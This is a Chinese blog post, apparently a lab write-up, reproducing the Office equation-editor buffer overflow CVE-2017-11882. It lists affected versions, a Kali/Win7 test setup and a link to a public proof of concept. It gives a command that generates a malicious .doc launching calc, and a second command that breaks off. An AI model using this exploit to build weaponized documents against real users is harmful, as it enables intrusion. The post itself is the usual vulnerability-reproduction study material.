CVE 2017-11882 office缓存溢出漏洞复现

本文详细介绍了CVE-2017-11882 Office缓存溢出漏洞,包括漏洞概述、影响版本、复现环境和步骤。通过在Kali Linux上使用POC代码,针对Win7上的Office 2016进行测试,成功生成并运行了带有shell的后门Word文件。建议用户及时更新系统和打补丁以防止此类漏洞攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞概述

针对这个漏洞,微软在2017年11月14号,推送了常规的安全更新,其中,关于CVE-2017-11882的安全更新引起了圈里的关注,随之而来的,便是针对此漏洞的POC攻击代码被逐渐公开。
这里是poc地址

https://github.com/unamer/CVE-2017-11882

2.影响版本

office 2003
office 2007
office 2010
office 2013
office 2016

3.复现环境

渗透机:kali + POC代码【上述github地址】
靶机:Win7 + Office 2016

4.复现步骤

4.1 下载Office 2016 和POC

Office2016 下载地址:http://www.downcc.com/soft/290076.html

4.2 使用下载的POC进行测试

python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc
python CVE-2017-11882.py -c
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值